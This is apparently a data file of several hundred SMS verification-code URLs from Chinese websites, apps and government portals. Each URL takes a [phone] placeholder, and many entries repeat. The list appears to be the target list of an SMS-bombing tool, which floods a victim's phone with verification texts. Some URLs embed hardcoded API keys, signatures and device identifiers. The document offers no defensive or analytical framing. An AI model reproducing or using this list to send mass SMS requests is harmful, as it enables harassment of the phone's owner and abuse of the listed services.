"http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://wskh.newone.com.cn/newlogincontroller/getrandompassword?mobile=[phone]", - "http://doc.u-ease.com:80/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", - "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]&countrycode=86&mobilestep=1&_=1563973948741", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567899", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://gw.dianzhenkeji.com/userc/sms/[phone]/2?tenantId=dxtv", - "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", - "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", - "http://wwww.0cskj.top/api.php?act=user&key=L747V6vp26fVFuvp0&phone=[phone]", - "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://photograph.yuanlikj.cn/send/Send?appName=%E6%88%AA%E5%9B%BE%E7%A7%80-%E5%AF%B9%E8%AF%9D%E7%94%9F%E6%88%90%E5%99%A8&TELMobile=[phone]", - "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]&_=1551173567991", - "https://beacons.gcp.gvt2.com/domainreliability/upload", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://www.hyb100.com/huoyb/vc10001.action?userid=[phone]&ic10000=", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://register.7moor.com/Action?callback=jQuery17202698357481160306_1589614815141&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1589614821972", - "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]&agenttype=20&app_version=10.7.5&area_code=86&device_id=5C351103-F887-4932-BC59-58C75875EFDE&device_name=liang%E7%9A%84%20iPhone&device_type=iPhone8,1&dfp=876bc199dfb98e452da6f0f683179849687da", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", - "http://passport2.chaoxing.com/num/phonecode?phone=[phone]&needcode=false", - "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&phoneNum=[phone]&uid=&code=", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", - "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", - "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.cstm.org.cn/wxReg/regPhoneCheck?regPhone=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://androidapi4.yc.ifeng.com:443/api/fread/user/msgAuthCode?phoneNum=[phone]&v=5.5.32.83027", - "http://api.xingchentd.com/logic-user/user:users/mobile/?mobile=[phone]&projection=withRoles", - "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]&_=1547130695671", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", - "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "https://dappweb.huolala.cn/index.php?_su=1609554659540820860&revision=&_m=register&_a=send_register_sms_code&phone_no=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", - "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", - "http://slb-sport.vesal.cn/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", - "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", - "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", - "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1590559098473", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", - "http://www.hx2car.com/mobile/loginCode.json?code=d889c6084be2613b8ed976d2336bc53a&devicetoken=0FAEEA4E-B279-4409-93A6-05B4EDE49DE8&phoNum=[phone]", - "http://api.huatu.com/lumenapi/v4/common/message/send_by_java?callback=callbackSendCode&mobile=[phone]&_=1547130695671", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=12", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://dapi.mting.info/yyting/usercenter/getVerifyCode.action?phoneNum=[phone]&type=0&token=&imei=&nwt=1&q=27&sc=", - "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://mapi.qfang.com/appapi/v8_3_2/sms/validateCode?codeKey=27FA9799-8840-408F-9C14-116B054296B3&countryCode=86&dataSource=SHENZHEN&devIDFA=5C351103-F887-4932-BC59-58C75875EFDE&devId=C99D7E86-40F2-4B39-A2DD-5438D94BC5E5&devModel=12.4&devOpenUDID=40dfbfa80eda77c04", - "http://api.mianmianyue.com/basis/sendCheckCode?mobile=[phone]&checkSign=Gec1LPgwdA4OOyqQLAS5UkZnmck2eRyJxJP6rvTU7K8%253D", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", - "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", - "https://api.julym.com/hz/api.html?number=[phone]", - "http://bank.wo.cn/wxun/api/my/getSmsCode?mobile=[phone]", - "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", - "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO+6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC+/CA&phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", - "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.2847588&imei=F3F6BCC9-", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://kyddn.log56.com/sq_server/verifyCode.action?mobile_no=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App Store&ip=192.168.43.151&mobile=[phone]&udid=5WklXEFrvscsddZR8s3TrLI45Bg0YEW9MkEFqRLSrR1ZKpY81h2wTw8pEHBo", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]&hash=9f82736455da1c53", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", - "http://api.wangxiao.cn:80/app/user.ashx?mobile=[phone]&t=mobilelogincode", - "http://www.huobiao.cn/core/login/get_code_snv?jsonpcallback=jQuery22408161556854897054_1570699976143&phone=[phone]&_=1570699976144", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", - "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]&type=1", - "http://weizhang.58.com/user/login/getcode?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", - "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "https://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]&app_code=ECS-YH-WAP", - "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://ly.hao315.com/MsgYzm.php?tel=[phone]", - "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", - "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=%2B86&mobile=[phone]", - "http://m.robotest.cn/user/sms.html?tel=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]&os=ios&timestamp=1569225015&type=mobile&soft=5.4.2&_=1580993309101", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://case.100.com/captcha?source=57&mobile=[phone]&resend=0&mkey=customer", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", - "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://appsource.taohv.cc/user/sendRegisterCode.php?version_android=4.1.9&channel_android=lianxiang&mobile=[phone]&code=&sign=21119a7fa9bbb06b6470ce49db996711", - "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", - "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://demo.q20x.xyz/sms.php?phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]&imgcode=&token=aa315477956d459f40b6f26c9090b790&sendtype=mobilemsgpwd&msgtype=1&captchaVersion=2&user_domain=cc&business_domain=&hpuid=924-ECmHmDZ0xdhMnXe-43&callback=reqwest_1589532775907030687", - "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", - "http://api.wangxiao.cn:80/app/user.ashx?mobile=[phone]&t=mobilelogincode", - "http://www.imdxd.com/api/method/getCode?phone=[phone]&type=2", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", - "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", - "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", - "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", - "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", - "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", - "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "https://couple-api.jizhangapp.com/login/captcha/[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", - "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", - "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]&sign=FB3ED4C94F2877A29366F19C4A7CED68", - "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", - "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]&isNewUser=1&messagePassWord=50BF9B170BC3FFD3F1F0C8E113DA88E6ADAF75D364508DB8969BA8928249E4CCD0AE01A96E8E435EDA7B5E7BB28F9D584BA1CEE44BC02D41C21D8DF04604A225", - "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", - "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", - "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", - "http://reg.suning.com:80/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", - "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]&expect=0", - "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", - "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", - "http://api.luobokoudai.com/User/GetCodeByPhone?ip=124.228.103.38&source=1&channel=yingyonbao&key=f996ee442307b7c6ccfcfc68bcf77682&user_phone=[phone]", - "https://mapi.wandougongzhu.cn/?method=User.sendRegCode&ch=appstore&devid=6850174bf9bcd0264c01eac202a8447e&devname=&devtype=iphone_gg&dpi=750x1334&img_fmt=webp&lang=zh-Hans-CN&loc=&model=iPhone8%2C1&network_type=wifi&os_version=12.4&phone=[phone]&rtick=1566790690.50", - "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", - "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", - "https://api.bat100.net/v1/authority/sms/send-sms?tel=[phone]&smsType=2", - "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=%23code%23%3d321809&key=a68cead9b27523c56ce7fd7fc1312ea4", - "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", - "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", - "http://pass.hujiang.com/Handler/UCenter?action=SendMsg&callback=&imgCode=&token=&_=&mobile=[phone]", - 